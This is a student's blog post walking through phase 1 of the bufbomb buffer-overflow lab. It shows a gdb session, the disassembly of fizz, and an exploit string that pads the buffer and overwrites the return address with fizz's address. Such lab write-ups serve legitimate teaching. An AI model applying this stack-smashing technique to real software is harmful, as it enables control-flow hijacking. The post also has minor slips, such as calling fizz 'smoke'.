Sunday, January 12, 2014

Bufbom Phase 1


getbuf[plueonde@bert buflab-handout]$ gdb bufbomb
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-45.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb...(no debugging symbols found)...done.
(gdb) b getbuf
Breakpoint 1 at 0x8049088
Run your cookie
(gdb) r -u plueon2
Starting program: /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Breakpoint 1, 0x08049088 in getbuf ()
Goal of pahse 1 is to overflow the buffer and inject the fizz address to the getbuf function
Breakpoint 1, 0x08049088 in getbuf ()
(gdb) disas fizz
Dump of assembler code for function fizz:
0x08048c58 <fizz+0>:    push   %ebp <= address of fizz function
0x08048c59 <fizz+1>:    mov    %esp,%ebp
0x08048c5b <fizz+3>:    sub    $0x8,%esp
0x08048c5e <fizz+6>:    mov    0x8(%ebp),%eax
0x08048c61 <fizz+9>:    cmp    0x804c1e4,%eax
0x08048c67 <fizz+15>:    jne    0x8048c87 <fizz+47>
0x08048c69 <fizz+17>:    mov    %eax,0x4(%esp)
0x08048c6d <fizz+21>:    movl   $0x804a1bd,(%esp)
0x08048c74 <fizz+28>:    call   0x8048870 <printf@plt>
0x08048c79 <fizz+33>:    movl   $0x1,(%esp)
0x08048c80 <fizz+40>:    call   0x80490a0 <validate>
0x08048c85 <fizz+45>:    jmp    0x8048c97 <fizz+63>
0x08048c87 <fizz+47>:    mov    %eax,0x4(%esp)
0x08048c8b <fizz+51>:    movl   $0x804a08c,(%esp)
0x08048c92 <fizz+58>:    call   0x8048870 <printf@plt>
0x08048c97 <fizz+63>:    movl   $0x0,(%esp)
0x08048c9e <fizz+70>:    call   0x8048930 <exit@plt>
End of assembler dump.
(gdb) quit
Next step create the buffer overflow to fizz function
using hex2raw to generate string
generate 61 indicating letter a in hexadecimal  followed by the reverse address of the smoke function
[plueonde@bert buflab-handout]$ vim exploit2.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
58 8c 04 08
Save the file and test it out
[plueonde@bert buflab-handout]$ cat exploit2.txt | ./hex2raw | ./bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Type string: You called fizz()  <= complete the task
VALID
NICE JOB!

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)